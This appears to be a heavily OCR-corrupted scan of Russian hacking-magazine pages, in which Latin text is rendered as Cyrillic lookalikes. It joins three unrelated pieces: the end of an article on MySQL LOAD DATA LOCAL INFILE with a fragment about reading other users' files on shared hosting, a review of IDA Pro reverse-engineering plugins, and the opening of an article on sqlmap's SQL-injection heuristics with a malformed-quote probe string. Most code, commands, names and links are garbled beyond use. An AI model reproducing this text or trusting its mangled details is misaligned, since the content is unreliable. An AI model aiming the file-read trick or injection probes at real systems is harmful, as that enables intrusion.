на зпагед-хостинге, но хотим прочитать скрипты из домашнего пузата, похоже, было принято решение внести существен- 
каталога другого пользователя. Тогда, установив такой скрипт РНР За е Моае ные изменения: при дефолтных установках этот оператор те- 
РИезучет Сисит- перь вообще не будет выполняться [#54158], [#55737]. Будем 
<?рИр уепНоп РгоШет: надеяться, что в ближайшем будущем разработчики наведут 
фрао = пем РОО('ту$41 : По5{=нашхост ; Чбпате=«- БИ. 1у/17-$Оо\ порядок в этом вопросе. —и- 


КЛИЕНТ-СЕРВЕР 


Для того чтобы лучше понять возможности нове стандартной клиентской библиотеки \ Прямое 
-ОАВ БРАТА, необходимо вспомнить, что СУБД И6туза[, которая поставляется вместе _ назначение 
МуЗОЕ использует традиционную архитектуру с СУБД МУ$ОЕ. | : оператора 
клиент-сервер. Работая с МузОЕ, мы реально ГОАО ОАТА 
работаем с двумя программами: Если при использовании стандартного кли- | 
. программа сервера базы данных, рас- ента МуЗСОЕ не удается задействовать оператор 

положенная на компьютере, где хранится [ОАВ ВАТА ГОСАЕ, то стоит воспользоваться 

база данных. Демон туза! «прослушивает» ключом - -1оса1 -1п81е: 

запросы клиентов, поступающие по сети, 

и осуществляет доступ к содержимому базы туза1 --10са1-1пА1]е затраь старыми версиями, поэтому ГОАВ ВАТА ГОСАЕ 
данных, предоставляя информацию, кото- туза1> ОАО БАТА ГОСАЁЕ ТМЕТЕЕ 'тетбег. обычно доступно для стандартных клиентов. 
рую запрашивают клиенты. Если туза! за- фхе' ТМТО ТАВЕЕ тетбег; Однако команды к Му5О!-серверу отсылают- 
пущен с опцией - -1оса1-1п#1е=0, то [ОСАЁ ся в основном не из консоли, а из скриптов, 
работать не будет; Либо указать в файле /ту.спР опцию поэтому в языках для веб-разработки также 
клиентская программа осуществляет под- для клиента: имеются клиенты для работы с базой данных, 
ключение к серверу и передает запросы которые могут отличаться по функционалу 

на сервер. Дистрибутив СУБД МУЗСЕ вклю- [с<11еп*] от стандартного клиента Му$ОЕ. 

чает в себя несколько клиентских программ: ]1оса1 -1п81е=1 Конечно, эта особенность оператора 
консольный клиент МуЗОЕ (наиболее -ОАБ БРАТА может быть угрозой безопасности 
часто используемая), а также тузаитр, Важно отметить, что по умолчанию все системы, и поэтому начиная с версии МузОЕ 
тузааатт, пу$а[5Поми, пузаитро и так МузОЕ-клиенты и библиотеки компилируются 3.23.49 и МУЗСОЕ 4.0.2 (4.0.13 для \Мт) опция 
далее. А при необходимости даже можно с опцией - -епаб1е-1оса1 -1п81е для обеспе- [ОСАЕ будет работать только если оба — клиент 
создать свою клиентскую программу на ос- чения совместимости с Му ОЕ 3.23.48 и более и сервер — разрешаютее. 


Взлом 


ВАНА 


Дмитрий < 
«0191» Евдокимов 4 
Ока! Зесищу ‚ЗА, / 
\“\&” 


Любой инструмент, каким бы продвинутым ни был, не способен решить все задачи пользователя. 
Поэтому разработчики предусматривают возможность расширения продукта за счет плагинов. 

Даже РА Рго, активно используемый реверсерами по всему миру, без расширений — лишь очень 
хороший дизассемблер. Чтобы превратить его в грозное оружие реверс-инженера, придется об- 


Обзор самых интересных 
плагинов для популярного 
дизассемблера 


весить его плагинами. Наиболее интересные из них мы специально отобрали для тебя. 


СЪА$$ 1МРОВМЕВ 
БИ. У/УОСМ/5Е 


Ввиду активного использования в настоящее время ООП, данный плагин просто обязан быть в арсена- 
ле любого реверсера. Он сканирует М$З\УС 325# ОВ файлы на наличие уНаЫе$ (таблицы виртуальных 
функций) с С++ АТТ! (Вип-Пте Туре пюгтаНоп) и МЕС АТС! (САВипитеС1а$$ структура) типом данных. 
Ищет и выделяет определенные структуры, имена, метки и комментирует их в дизассемблированном 
листинге, делая таблицы виртуальных функций более читабельными для реверс-инженера. 


; 5ЕкисЕ СНЕПТНо$ЕСЕк1: 5кисЕ ТСтдТакдее; [МГ] 0: 36, Й: 1 (С1а55 Тафокптек) 
99 орръег 33_ВаСНЕт1Но5ЕСЕе1@@6втЕНОкорТагнде{Напд91ен@@@ 

; соп5Е СНЕПТНОо$ЕСЕЕТ : : `орбабте ' {вок `ТЕМОкорТакде{Напотек ' } 

23_?7СНЕттНо5ЕСЕкт@@6втЕНОкорТандеЕ Нап 1 е @@@ 99 орР5еЁ зи6_50242Е 


99 орРзеЕ зи6_502483 
99 орРзеЕ зи6_502269 
99 орРъеЕ зи6_502888 
’ 
; с1а55 СНЕПТНо5ЕСЕЕ1: ЙТЬ : :С 41 1901 пр1<СНЕтТНо$ЕСЕк1 „ТЕ : :С 41 190 ,ЙТЕ : С 1 пТка1{5<1442840576,0>>, ЯТЕ : :С 41 пдош1 пр1 
99 орРъеЕ 3?_ВАСНЕт1Но5ЕСЕкт@а6вснеттНо5 Секта 
; СОП$Е СНЕПТНО$ЕСЕЕ1 : : `орбСабтТе' {ог `СНЕПТНо$ЕСЕк1 * } 
33_ТСНЕПТНо5 СЕКТ а@6вснет1Но5СЕк1@@@ 99 оррзеЕ 5и6_н56й5Е 


99 орРзеЕ эиб_НН10ЕЕ 
99 орРзеЕ эиб_#41096 
49 оЕРэеЕ пи115и6_239 


Результат работы С!а$$ штогтег 


|РАЗСОРЕ АЕ - 

И. у/Вти!96 аъ 7 |: о и ЕБн 

Так получилось, что в 2012 году на Нех-Вау$ ы 

Рид-т сощез{ оказалось два победителя, и, НЕ АИНЫ ИАА: 

как ты догадываешься, ЮАзсоре — один из них. пит тт т "ЗН Я "Г КЗ ЗЫ ИЯ 

Данный плагин разрабатывался людьми, которым рык ЗВ ВИ Е СЕГО ЗЕ 

в силу специфики своей работы часто приходит- [№0 0607050 зы 607080 о 2 бо чоооббо 

ся заниматься анализом вредоносного ПО, так фр а И РР О Ни 

что он в основном заточен на решение типичных 

задач, возникающих при реверсинге малвари. И. 

Функционал разбит натри основные вкладки. М см пл течи т 
Вкладка Рипсйоп пзрес#оп помогает доопре- | и 


делить функции, которые не смогла определить 
А, и разобраться, что происходит внутри функ- 
ций (какие импортируемые функции вызываются 
и с какими параметрами). После чего в соответ- 


Интерфейс РА$соре 


ствии с этим переименовать их, добавив к ним 
приставки, типа Вег_ — если функция работает 
с реестром, №$2_ — в случае работы с сетью, 


Е11е_ — в случае работы с файлами и так далее. 
А также переименовать потенциальные функ- 
ции-обертки — те, в которых происходит только 


МЕР 

и. у/15 ао! 

Универсальный швейцарский армейский нож 

для ША Рго. Был создан для поиска уязвимостей, 

но может использоваться и в повседневных за- 
дачах реверсера. Если кратко, то МШЕ заточен 
на поиск «интересных» функций и инструкций, 
он добавляет их список в сизют мемегы и вы- 
деляет цветом в дизассемблированном листинге. 

Итак, МШЕ способен: 

. выделять опасные функции (использование 
которых может привести к уязвимости, на- 
пример са11 тетсру); 

. искать инструкции 


сравнения (полезно 


при анализе парсеров, стр е$1, 141); 

. искать функции, связанные с файловым вво- 
дом-выводом; 

. искать функции, связанные с сетевым вво- 
дом-выводом; 

. искать функции выделения/освобождения 
памяти. 


лишь один вызов импортируемой функции. Так 
что за пару минут у тебя на руках уже будет до- 
статочно неплохая картина о том, за что отвечает 
большинство функций в программе и с чего стоит 
начать исследование. 

Вкладка \№МпАР! Вгомзтда — это справочник 
по М/пАР!-функциям прямо из окна РА Рго. Так 
как запомнить все АР! \МЛпаом/5 физически не- 
возможно, а лазить каждый раз на сайт М$ОМ 
достаточно неудобно, то данная вкладка будет 
оптимальным решением. Для этого, правда, при- 
дется достать из ЗОК так называемые М!сго$ой 
Нер Сотрйеа Зогаде (*.НХ$) файлы и прописать 
до них путь, чтобы 1РАЗсоре знал, куда смотреть. 

Вкладка Сгурто 1еп!ЯсаНоп — название вклад- 
ки также соответствует предлагаемому функцио- 
налу: плагин пытается на основе базы сигнатур 
и эвристик определить хорошо известные крипто- 
алгоритмы, используемые в программе. 


Опуег Сопйашгавюй _ | — ОфегОрбо5 — | — АБоирАЗеаь 


З{еайй Тесплюиез (1) | $4еайН Тедрпюиес (2) 


Сотитоп 5{еай} Тесфпюие$ 

№ОиегудБесе (Раке питьег оЁ деБид рог) 

В бе \бюБаЯадз (Ргемеп" деБид Неар и\вайгавоп) 
№Юиегубу$ет пт югтабоп (РаКе геблгл уаме #тот Кегпе!) 

[М] мюиегут®гтабопРгосез$ (пдидез СнеВето!еОеБиддегРгезет() 
бе{ТкКСоип* - 1петеазе еабн те Бу гапдот уаме #от гапде: 0 - |0 
Адуапсед НМ/ ВР рго{есбоп (СогцехЕ АРТ5/КИегЕхсербоп0краНег) 
бе!\егзюп + бе\МегзюпЕх + Уепумегзюптт® (Ргейепд МлпХР $РЗ) 
итргоуед №Сюзе (5юр ЮВабеЦсегЕхсербопОра!Нег) 


ОжаЫе Над$ 

[М] теоеБиддегРгезеп! (Ра РЕВ.Вета0еБиддед) 
№сюБаНад (Рай дюБа!Вегр #ад$) 

НеарЯад + РогсеРад (РаН офег Веар #а9$) 


СюБа/Епаце 
[Мепабе э{еаЙн унеп деБиддег ${а“$ 


Однаиз вкладок РАЗ1еаНИ 


1РАЗТЕАЕТН 

БК. [у/ацхаЕ 

Плагин РАЗеаКИ пытается помочь отладчику РА 
противодействовать довольно хорошо известным 
антиотладочным приемам, которыми активно 
пользуются как программы защиты ПО, так и вре- 
доносы. Состоит из двух частей: непосредствен- 
но самого плагина и ВЕ ки, которая инжектится 
в отлаживаемый процесс, как только происходит 
аттач. Она реализует большинство маскирую- 
щих отладчик техник, используя либо хукинг си- 
стемных вызовов (МОчцегубуетиоттайоп, 
МЮОчегуттогтанопРгосез$$, АИбениСора!Лад$з, 
МЮОчегуоЦес....), либо патчинг определен- 
ных флагов (15ОШебиддегРгезет, №МОюоБа!ад, 
НеарНад + РГогсеНад...) в процессе. Боль- 
шой плюс плагина — его можно использовать 
как при локальной, так и при удаленной отладке 
приложений, что очень полезно при анализе вре- 
доносного ПО. 


РАЗУКРАШИВАЕМ ТА РКО 


Для людей, которые значительную часть рабо- 
чего времени проводят в ША Рго, очень важно 
представление данных, так как от этого напрямую 
зависит производительность работы. Отчасти 
данную проблему можно решить с помощью ак- 
тивно набирающих популярность цветовых схем 
для РА Рго. 

Устанавливать цветовую схему можно двумя 
способами: 


Через файл реестра (расширение гед). Дан- 
ный способ подходит для ША Рго 6.3 и более 
ранних версий. Недостатком этого подхода 
является необходимость вносить изменения 
в реестр. Поэтому для возвращения в исход- 
ную схему необходимо будет предварительно 
сделать ее Баскиур. Для этого заходим в ветку 
реестра НКЕУ СУВКВЕМТ_У$ЕК\$оРмаге\Нех- 
Вауз\ТРА и экспортируем ее в файл. 


ТООЕВАС 

Би У/НБМЕ 

Плагин от парней из Еходи$ |ще!депсе, активно 
занимающихся поиском, эксплуатацией и покуп- 
кой уязвимостей и эксплойтов. Они не понаслыш- 
ке знают, что надо делать, чтобы найти уязвимость 
в чужом коде, так что их плагин Тоофад как раз 
и заточен под данную задачу. Он имеет в своем 
составе действительно большое количество раз- 
личных фишек: от управления историей коммен- 
тариев до совместного реверсинга. 

Начнем с того, что наиболее интересные с точ- 
ки зрения реверсера функции исследуемого при- 
ложения можно добавлять в историю, при этом 
учитывается отношение новых функций с уже до- 
бавленными, то есть наглядно показывается, ка- 
кая функция из какой вызывается. Это очень удоб- 
но: если ты, например, разреверсил функции, 
которые отвечают за прием данных и потенци- 
ально имеют уязвимость, то таким образом сразу 
становится понятно, по какому пути стоит дальше 
вести работу. Располагается данный функционал 
на вкладке Ногу. Помимо этого, там есть еще 
две очень полезные кнопки ЗПом/ 5119$ и ЗЭПом/ 
про, которые соответственно покажут все 
строки и все импортируемые функции, использу- 
емые в выбранной функции. А если нажать правой 
кнопкой на имя функции в окне истории и выбрать 
пункт Оиегу ОВ, то можно запросить с определен- 
ной глубиной список вызывающих или вызывае- 
мых функций для нее. 

Тоофаа использует собственную псевдо фай- 
ловую систему, для этого в ШОВ-файле создается 
дополнительный сегмент. В данной ФС можно 
хранить что угодно — от сессии текущей работы 
плагина до дампов сетевого трафика, приводяще- 
го кпадению исследуемой программы. Так что все 
будет лежать в одном месте, и все это легко будет 
передавать между сотрудниками, работающими 
над одним проектом. Получить доступ к этому 
функционалу можно из вкладки Ейе учет. 

Еще одна интересная вкладка — РайЙЯпашод, 
название которой говорит само за себя. При об- 
ратной инженерии часто встает вопрос: а можно 
ли из данной функции попасть в другую, или мож- 
но ли попасть из начала функции в интересующий 
базовый блок, минуя блок, содержащий вызов 
функции Ргее (). Как нетрудно догадаться, данный 
плагин поддерживает поиск путей как на уровне 


функций, так и на уровне базовых блоков. А ре- 
зультат работы будет отображен в виде отдельно- 
го кликабельного графа передачи управления. 

Чтобы поделиться данными с другими ис- 
следователями, работающими над проектом, 
не нужно использовать какие-то дополнительные 
системы или задействовать расшаренные ресур- 
сы, для этого достаточно лишь зайти на вкладку 
Очечце$. Вообще, про этот плагин можно долго 
еще писать, поэтому советую тебе самостоятель- 
но ознакомиться с остальным его функционалом 
в боевых условиях. 


Тооад эх 


Меми 


| 51р{$ | Ра Япата | Ре бузет ] Ногу ` СоБа/ Маз | 


|" Зы В 
Мате АЧФгез$ 
зоЪ 8СЗВВО 0х008..- 
а 
Й ТочСМ 0х00: 
зыь 551850 0х005..- 
ОезспрНоп ГосаНоп бгоир  АЧдгез$ 


Са +0 трог{ед блпсбопз: 


№прой Мате СаЙег АЧ9гез$ 


КЕВМЕЕ 3211... 1о9СМО 00055061 с 
КЕКМЕТЗ2!Е... 10о9СМО 0%0054{е8е 
5 пд геРегепсез: 

п ` СаНег АЧЧге5$ г 
ХИ4=39: зуБ_551850 000551645 
ХРч= 39: 5у6_551850 00055162 
ММОККЕЕЕ о9СМВ 000550866 
ММОККЕТЕ о9СМВ 000550625 
\МОВКЕТЕ о9СмМО 0%00550е2е 
ММОККЕТЕ о9СМВ 000551315 = 


Интерфейс Тоофад 


; 40149 __РазЕса11 __5есиг1Фу спеск_соок1е(ип5191пе9 1пЕ соок1е) 


@ сесирг1тЕуи спеск соокте@н ргос пеак 


спр 
112 
гер ге{п 


.ТехеЕ : 99491 90С 
фал1ике : 
пр 


@ сесиг1Фу спеск соокте@н епд р 


Цветовая схема Соп5опапсе в действии 


Через файл цветовой схемы (расширение 
с). Данный способ подходит для РА Рго 6.4 
и старше. С версии 6.4 цветовыми схемами 
можно удобно управлять из вкладки меню 
ОрЕ1оп —> Со1ог$. 


Лучше всего подобранные и, как следствие, 
самые популярные публичные схемы: 


; СОБЕ ХВЕЕ: _ма1п+С9Тр 


: 5есиг1 Ту _соокте 
5ПогЕ #а11ике 


; СОБЕ ХВЕЕ: __5есиг1®у_спеск_соок1е(х) +61] 


герое _405#а11иге 


. Сопзопапсе ( 
. ооаптеа Бакк ( 


Также для удобства работы с цветовыми схе- 
мами (для версии 6.3 и ниже) есть скрипт РА Союг 
Трете Зсир{$ ( ), основная задача ко- 
торого — импорт/экспорт цветовых схем между 
ВЕС- и С1В-форматами. 


Взлом 


Асаизгегоск(& ->бупсЕуеп*, &а2); 
2+ ( !СНесКктТ+0Ь3Ех1 5+5 (м3, о 
{ 


= пем(68); 


+ ( < ЕЧИ соглтеп{ 


) 
= зиЬ_1903ЕЕЕВ(\4) ; 
е15е 
= 0; 
= ЗтагЕРЕг“_Тп1а11хеВу0Ь]ес*(8м16, ); 
= (*(\3->Ма1п31.уУТа1е + 16))(&1а); 
ЗтагРЕг_СотрагеАпаСору (\7 , )}- 
Оез*__ (&№16); 


5По\/ са${ 


} 
Ке1еазе!оскК(&а2); 
= (*(\3->Мазп31.УТа1е + 16)) (&14); 
= ->Ке?№; 
= ->ОБ3ес*; 


Тп+ег1оске4Тпсгетеп* ( ): 
АсаиткеГосКк( ‚ & ): 


Результат работы 
НехВау$Со4ехр!огег 


ОВ-$УМС 
Буа Лам 


Еай Ыоск соттеп{ 
Мак а$ аесотрйеа 
Сору о аззет у 


Био ау сгарв 
ОБес+ Ехр!огег 
КЕсоп${гис{ Туре 


НЕХ-ВАУ$ ОЕСОМР.ЕВ 

БИ. |у/1О\/ХиВЕ 

Нех-Рауз Оесотрйег — это отдельное болышое 
платное дополнение для РА Рго, которое реали- 
зует функционал декомпилятора (поддерживает 
х86/ААМ-архитектуры). Мало кто знает, но это 
дополнение имеет еще и собственный ЗОК на С/ 
С++, который значительно отличается от ЗОК иды, 
но также позволяет писать плагины. Кроме того, 
умельцы уже создали и Бпата для РУоп под на- 
званием Пехгау$-ру{Поп (БИ.Лу/189Аснн). 

Яркий представитель плагинов для Нех-Нау$ — 
НехАаузСодеХр/огег, дополнение, которое улуч- 
шает навигацию по объектно-ориентированному 
коду. Любой ресерчер, кто исследовал приложе- 


Одна из крутых фич ПРА Рго, которой недостает многим хорошим отладчикам, — возможность предста- 
вить ассемблерный код в виде графа. Так ассемблерный листинг становится более читабельным, а ско- 
рость отладки/реверсинга резко возрастает. К сожалению, мощный \\ИпОБод похвастаться такой функцией 
не может. Чтобы свести воедино мощь двух популярных инструментов, можно воспользоваться расши- 
рением аб-зупс. Оно позволяет динамически синхронизировать окно ЮА-графа с текущей позицией 
в МИпОБс. Так что все, что ты делаешь в МИпОБа, можно быстро перенести в качестве комментария в !РА 
и при этом все отслеживать на наглядном графе. Особенно удобно пользоваться этим плагином при на- 


личии двух мониторов. 


ОБНУМИСВАТЕ 

БЦ. у/144сЕМУ 

При реверс-инжиниринге редко когда 
дело обходится только одним инстру- 
ментом. Не исключение и дизассем- 
блеры с отладчиками. Каждый отладчик 
имеет как сильные, так и слабые сторо- 
ны, и у каждого они свои — идеального 
инструмента нет. В одном удобно обхо- 
дить антиотладочные приемы, в другом 
использовать огромный арсенал уже 
готовых плагинов, а в третьем писать 
собственные скрипты. С недавних пор 
стало возможно работать последова- 
тельно сразу в О!у0Ь91/2, ттипйу 
Оебиосщег, ГРА Рго и \МИпОБд. Благодаря 
ОГуМмМюгае Риат (ои.Лу/1от9!) можно 
передавать процесс отладки другому 
отладчику без перезапуска. Так что мы 
можем задействовать только сильные 
стороны каждого отладчика, используя 
миграцию от одного к другому. 


РАСШИРЯЕМ 1БАРУТНОМ 


Как ты знаешь, 1РАРУПоп — это всего лишь обертка над ША ОК. И по тем или 
иным причинам не для всех функций существует биндинг Но это не беда, так 
как можно самому его реализовать с помощью библиотеки < уре$. 

Например, кросс-платформенная реализация вызова ве*_1оа4ег_пате() 


будет выглядеть так: 


14апате = _ ры 
1Р °у5. "м : 


911 = сфуре$ .м1п911[19апате + _ 


@ ТРА - С:#ОеБиддег#са!с_ирхлаЬ (са|с_ирх.ехе) 


Ре ЕД Зитр беагсп \ем ОеБиддег ОрНоп5 \Ипадомз Нер 


рим оф в Ша хо 5 ви 


АЦ: Че Бом ОК: 21СВ 


[ ТА Мем-ЕТР 

01020038 1пс ед! 
01020036 ог а 
0102003Е 1} эро 


а 
г 


[ос_102001С 


01020040 том есх, е4! 
01020042 рчзЬ ед! 


01020044 герпе зсазБ 
01020046 ризБ ебр 


01020040 ог еах, вах 
0102004Е }= зрог{ |ос_1020058 


100.00% — (177,2841) (435,265) 00007143 01020043: $а1+133 


Передача отладки при- 
ложения в РА Рго 


е11т 5у5.р1аЕФогт 


911 = сфуре$.с911[ И 


е11+т зуз.р1аФогт == 


ния на С++, понимает, что ША не поддерживает 
абстракцию на уровне объектов. Однако тут можно 
выкрутиться за счет представления объектов ввиде 
структур. НехВаузСодеХхрюгег добавляет навига- 
цию по функциям внутри этих структур, которые 
отождествляют, например, вызов конструктора или 
деструктора. Также на борту НехВаузСоаеХр/огег 
есть функционал для автоматической реконструк- 
ции некоторых объектно-ориентированных кон- 
струкций и навигации по таблицам виртуальных 
функций. Этот плагин очень полезен при статиче- 
ском анализе больших программ, разработанных 
на С++. Авторы обещают развивать его дальше 
и открыть исходные коды после оглашения резуль- 
татов конкурса Нех-Вауз Р!ид-ш сощез. 


РОМСАР 

ЬК.1у/100Оаа7 

Рипсар добавляет гипите-информацию в дизас- 
семблированный листинг РА в виде коммента- 
риев и подсветки кода. При этом он единствен- 
ный плагин в обзоре, который для своей работы 
требует, чтобы исследуемое приложение было 
запущено из-под отладчика ПРА. Он записывает 
параметры, которые поступают на вход функци- 
ям, и значения, которые функции возвращают. 
Вся эта информация может дампиться как в тек- 
стовый файл, консоль, так и в виде комментариев 
к инструкциям САЕЕ, естественно, что в консоли 
и в текстовом файле информация более подроб- 
ная. Также Типсар очень полезен при идентифи- 
кации косвенных вызовов, типа САГЁ еах. Плагин 
сразу подпишет, на какой адрес или функцию был 
совершен переход. Идем дальше — благодаря 
команде 4.соде_41$сомегу = Тгие плагин спо- 
собен идентифицировать функции, которые ША 
не смогла распознать на стадии статического ана- 
лиза (что бывает часто). По завершении работы 
отображается граф вызовов функций, в котором 
присутствуют уже разрезолвенные косвенные вы- 
зовы. Поддерживает х86/х64 и ААМ архитектуры. 


1еа еах, [ебр+Мешр11еНате] 
ри5й 1 ; Чир1ад$5 
ри5В еах ; 1рМечр11еНате 
ри5й е51 ; 1рЕх15119Е11еМапе 
агд_09: 0х00404314 --> 'С:\ВоситепЕ5 ап $е1п95\й4т1п15Екабон\Ьоса1 $е11195\805$е5$Мде* 
агд_64: 0х0012#098с --> 'С:\БОСОМЕМААЯОМТНт“ АЕ ОСЯЕ $ Ч1\Тепр\^да29 -Е пр 
агд_08: 9%00000001 --> "Мий’ 
са11 95: ; Кекпе132_МочерзтеЕхй ( } 
ЕЙХ: 9%00000001 --> 'М/й’ 
5_агд_90: 9х000н31н --> 'С:\ВоситепЕ5 ап@ $еЕ1п95\Й9т1п15Екафог\Еоса1 $е1{1п95\В0$е55Мди‘ 


5 акд_0%: 9х0012#98с --> 'С:\0СИМЕ“ААЯОМТНТ^ АЕ ОСЯЕ $1 \Тепр\^9а29 „Е тр’ 
5_агд_ 08: 9х00000081 --> "М/й’ 


Результат работы Фипсар вокне РА 


_ 4 1апатме + 


БиР = сфуре$.сгеа%е_$г1 
911.2еЕ 1оадег_пате (Би, 
ре ИЕ у: 


Подобным образом благодаря Суре$ можно использовать почти любой 


вызов из ОА ОК. 
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Обычно, исследуя сложную программу, приходится реверсить 
несколько файлов — например главный модуль программы 
и наиболее интересные с точки зрения ресерчера динамиче- 
ские библиотеки, в которых могут скрываться уязвимости, за- 
щитные механизмы и прочее. И тут есть проблема. Допустим, 
ты отреверсил какую-то ОШ: -библиотеку и принялся за экзеш- 
ник. В процессе исследования обнаруживается, что в коде вы- 
зывается функция из той самой библиотеки, но что она делает 
и какие параметры принимает — ты не помнишь. Приходится 
запускать еще одну копию ТРА Рго, загружать соответствую- 
щую 1Аб-базу и искать в ней нужную функцию. И чем сложнее 
программа, тем чаще придется совершать подобные дей- 
ствия. К счастью, этот процесс можно значительно упростить, 
воспользовавшись плагином ВРай$. Он позволяет работать 
сразу над несколькими бинарниками, при этом сохраняя каж- 
длую 'АБб-базу изолированной от остальных. С помощью Вай$ 
можно легко просматривать комментарии к функциям, нахо- 
дящимся в других запущенных экземплярах ПРА, переходить 
непосредственно к нужной функции в любом из запущенных 
экземпляров, а также легко управлять несколькими копиями 
[РА Рго. Увы, доступен Ва!$ только для ОЗ Х. 


| ——— —— - - 
+ № 
› й 
ГР Рапснопу чадом оо © ПИЮАМем-д ФП) Вай © О Нех Мем-А ФА биистигех = © 3 91195 мпвом ФЕ 
Ропсуюп пате рго9.ехе Вайз - 0.1 


рс_амзсап.ре 


Нпих.ао 
[2] 46.8 РЕНН 


Ы1х.21' Ваз Боел 1оа4ед. 
7аглаоа/ 4 4авгс/63/Ь4п/х86_вас_дсс_орЕ/44ац.арр/СопьетЕв/Иас0З/44с/ 44а. 44с'... 


Затр1е ТОС р1одфп: 1п1%() Ваз Бест са11еа 
атр1е Т0С р\очЁп: Кегж() Ваз Бееп са11е4 
4104%() са11еа! 

фехгт() са еа! 


: ке Обмт ОК: 16СВ 


мог ААА 


Работаем с несколькими экземплярами ОА Рго спомощью Вай$ 


ВМЕСТО ЗАКЛЮЧЕНИЯ 

Плагины сильно упрощают жизнь, но, естественно, не покры- 
вают весь спектр стоящих перед реверсером задач. Поэтому 
от таргета к таргету появляются все новые и новые скрипты, 
которые решают различные специфичные задачи. Так что будь 
готов к тому, что в один прекрасный момент тебе придется от- 
крыть !ЮЕ и начать писать собственное расширение (можешь 
потом выставить его на Нех-Вауз Р№ид-т сощез{ и даже вы- 
играть денежный приз). Удачи! = 


МЕЛОЧИ ЖИЗНИ РЕВЕРСЕРА 


Для корректной работы 
большинства плагинов 
из данного обзора нужна 
ОАРго версии >6.1 
и специальная версия 
Рузлае отНех-Вауз. 


Все упомянутые в статье 
плагины и скрипты ждут 
тебя на диске. 


Приведу еще список скриптов/плагинов, которые сильно упрощают повседневную жизнь 


реверсера: 


. Ппасгур{2 — помогает определить, какие криптоалгоритмы и хеш-функции использу- 


ются в программе; 


декеуз$.ру — скрипт для извлечения закрытых АЗА-ключей и сертификатов; 


'Чабтоа — поиск имен функций в М$ОМ через поисковый движок Втд; 
[РА\ММпНер\Мемег — встраивает в ОА справочник по инструкциям для процессорах86; 
оритксе — плагин для деобфускации кода; 
сойабгеажще — плагин для организации совместного реверсинга; 
'Аа-напз!а{ог — перевод строк через Сбооде Тгапзае на английский язык. 
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Начиная с 2009 года команда Нех-Вау$ ежегод- 
но проводит конкурс среди плагинов для РА 
Ро. В данном соревновании может принять 
участие любой обладатель лицензионной вер- 
сии программы, прислав свой инновацион- 
ный/полезный модуль, написанный на любом 
из языков программирования. В случае попа- 
дания в тройку счастливчиков, кроме упомина- 
ния автора на сайте Нех-Вау$, можно выиграть 
1900, 950 или 450 долларов в зависимости 
от занятого места. 

Итоги предыдущих конкурсов можно по- 
смотреть на официальном сайте — \лллми.пех- 
гауз.сот/соп{е$1$. Кстати, настоятельно ре- 
комендую ознакомиться со всеми плагинами 
в этом разделе — найдешь много интересного. 


Универсальных плагинов на все случаи жизни 
для ЛА нет, впрочем, как и для других инстру- 
ментов. Поэтому рано или поздно настанет 
момент, когда придется допиливать сторон- 
ний плагин под свои нужды или писать свой. 
На сегодняшний день собственные расшире- 
ния можно реализовывать чуть ли не на любом 
языке. Вот список лишь тех, которые сразу 
пришли наум: 

Е 

ПОС (ЫНУ/6ВЕпоА); 

 Рупоп (1РАРУоп) (БИ.1у/12М 1); 
 ПВуБу (1ЧаВчЪ) (5#.1у/1401С АВ); 

. Рей (А) (БК.у/15в!тРМУ); 


° чама (1Чауама) (6И.1у/154$@07); 
 чамазсирЕ (ТА УЗспри (6(.!1у/154$$52); 


. Осап (ИРАОСат, (5Н.1у/МхоВа). 


Сразу предупрежу, что большинство из этих 
биндингов давненько не поддерживается, 
так что использовать всю мощь родного ОК, 

к сожалению, не получится (но так как они 

в основном распространяются с исходным 
кодом, ты всегда можешь продолжить их под- 
держку собственными усилиями). Наибольшие 
возможности в плане встроенных функций 
присутствуют в плагинах на С/С+-. А активнее 
всех используются при написании скриптов 

и плагинов для РА Рго С/С++ и РУпоп. Поэтому 
больше всего примеров в Сети ты встретишь 
именно на них. С/С++ изначально поддержи- 
вался из коробки, а биндинг для РуУПоп раныше 
был отдельным проектом и лишь со временем 
стал входить в состав продукта. 

Что касается документации по АРП, то тут 
лучшим справочником будут исходники файлов 
из ЗОК. Также могу посоветовать документ ОА 
РЕУС-М ММАГИМ С М С/С++ (БИу/оММайчц), 

в котором описывается большинство функций 
и процесс написания плагинов на С/С+-, и, 
конечно, книжку ТПе РА Рго Боок: Тпе Упомаа! 
Сие то \\опа?’5 Мо${ Рору!аг О!5аззет ег, где 
есть целый раздел под названием ЕЖжептато 
ШРА’$ сараб!е$з. 


Взлом 


Искать и эксплуатировать 5О!-инъекции с помощью затар 
достаточно просто. Но за видимой простотой скрываются слож- 
ные алгоритмы, математические методы, которые и позволяют 
за считаные минуты найти уязвимый параметр или подобрать 
количество полей в запросе. О них мы сегодня и поговорим. 
Ведь зная, как функционирует инструмент изнутри, ты сможешь 
более продуктивно использовать его в своих тестах на проник- 
новение. 


тшноз[ау. Затраг@адтан: сот 
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ЭВРИСТИКАНАСЛУЖБЕ $ОЕМАР 
Уязвимые к $О{-инъекции веб-приложения ча- 
сто сконфигурированы так, что выводят пользо- 
вателю все сообщения об ошибках (например, 
при включенной опции 491$р1ау_еггог$ в РНР). 
Если отправить недопустимое значение параме- 
тра (например, ()) "(''’ "'"), веб-приложение 
ответит подробным сообщением об ошибке 
СУБД. 

зайтар использует этот вид эвристики для не- 
скольких целей. Первая проверка позволяет по- 
нять, какой сервер СУБД используется. Напри- 
мер, в случае если сервер возвращает ответ: 


ОЕ еггог: Уои Пауе ап еггог 1п уоиг 
ОЕ зупфах; спеск {Пе тапиа1 {Пат 
соггезропа$ Фо уоицг Му5$ОЕ зегуег 
уег51оп Фог {Пе г15й{ зупфах Фо изе 
пеаг....! 


то зайтар делает вывод, что он имеет дело 
с МУЗОЕ. С этого момента будут проводиться 
только МуЗОЁ-ориентированные тесты, причем 
фильтр будет работать как для тестов на более 
высоком уровне (опция --1е\уе1), так и для рас- 
ширенных наборов тестов (опция --г1$К). В слу- 
чае проверки сразу нескольких ЦВЕ (ключ -т), 
если задать опцию --зтаг*, зайтар быстренько 
просмотрит каждый адрес и выполнит подробное 
тестирование только тех, которые положитель- 
но «откликнутся» на эту эвристическую проверку 
(будут вызывать сообщение об ошибке СУБД). Та- 
ким образом зайтар может найти потенциальную 
цель в течение нескольких минут. 

Вторая эвристическая проверка — $01- 
инъекции проводится на параметрах, принима- 
ющих целочисленные значения. Когда параметр 
является динамическим (то есть с изменением 
его значения меняется ответ веб-сервера), а от- 
вет оказывается одинаковым как для арифме- 


[11:22:18] [МАВМТЮС] 
упТах; спес 
ЧП 5упта; 


-^ + 


‘ест1уе уа\ие($) 


Веиг1$11с (раг$1п9) 1е${ зНоме {Нат 1Не БаскК-еп ОВМ$ сои\9 Бе 'Му5дЕ'. до уси 


